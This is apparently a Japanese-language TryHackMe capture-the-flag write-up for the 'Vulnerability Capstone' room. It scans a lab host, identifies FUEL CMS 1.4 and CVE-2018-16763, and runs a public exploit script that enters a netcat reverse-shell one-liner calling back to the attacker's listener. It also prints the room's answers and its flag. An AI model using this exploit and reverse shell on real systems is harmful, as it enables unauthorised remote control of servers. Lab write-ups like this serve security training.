✒️

[THM-WriteUp] Vulnerability Capstone

2024/04/12に公開

Task2:Exploit the Machine (Flag Submission)

What is the name of the application running on the vulnerable machine?

とりあえずはnmapする。

root@ip-10-10-163-137:~# nmap -A 10.10.215.220

Starting Nmap 7.60 ( https://nmap.org ) at 2024-04-12 14:48 BST
Stats: 0:00:22 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 0.00% done
Nmap scan report for ip-10-10-215-220.eu-west-1.compute.internal (10.10.215.220)
Host is up (0.00030s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
| http-robots.txt: 1 disallowed entry 
|_/fuel/
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Welcome to FUEL CMS
MAC Address: 02:71:B3:D9:61:29 (Unknown)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.60%E=4%D=4/12%OT=22%CT=1%CU=39888%PV=Y%DS=1%DC=D%G=Y%M=0271B3%T
OS:M=66193BAC%P=x86_64-pc-linux-gnu)SEQ(SP=107%GCD=1%ISR=10A%TI=Z%CI=Z%TS=A
OS:)SEQ(SP=107%GCD=1%ISR=10A%TI=Z%CI=Z%II=I%TS=A)OPS(O1=M2301ST11NW7%O2=M23
OS:01ST11NW7%O3=M2301NNT11NW7%O4=M2301ST11NW7%O5=M2301ST11NW7%O6=M2301ST11)
OS:WIN(W1=F4B3%W2=F4B3%W3=F4B3%W4=F4B3%W5=F4B3%W6=F4B3)ECN(R=Y%DF=Y%T=40%W=
OS:F507%O=M2301NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N
OS:)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0
OS:%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7
OS:(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=
OS:0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.30 ms ip-10-10-215-220.eu-west-1.compute.internal (10.10.215.220)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.68 seconds

Answer

FUEL CMS

What is the version number of this application?

namepの情報にはヴァージョン乗ってなさそう。
webアプリケーションのようなので、一旦開いてみる。

Answer

1.4

What is the number of the CVE that allows an attacker to remotely execute code on this application?

天下のExploit-DBで検索

Answer

CVE-2018-16763

What is the value of the flag located on this vulnerable machine? This is located in /home/ubuntu on the vulnerable machine.

上記のexploitをそのまま使う

※事前にnetcatでリスナーを起動

root@ip-10-10-163-137:~# nc -lvp 4444
root@ip-10-10-163-137:~# python3 50477.py -u http://10.10.215.220
[+]Connecting...
Enter Command $rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.163.137 4444 >/tmp/f     

リバースシェルゲット

root@ip-10-10-163-137:~# nc -lvp 4444
Listening on [0.0.0.0] (family 0, port 4444)
Connection from ip-10-10-215-220.eu-west-1.compute.internal 58230 received!
/bin/sh: 0: can't access tty; job control turned off
$ pwd
/var/www/html/fuelcms
$ cd /home/ubuntu
$ pwd
/home/ubuntu
$ ls
flag.txt
$ cat flag.txt
THM{ACKME_BLOG_HACKED}

Answer

THM{ACKME_BLOG_HACKED}

Discussion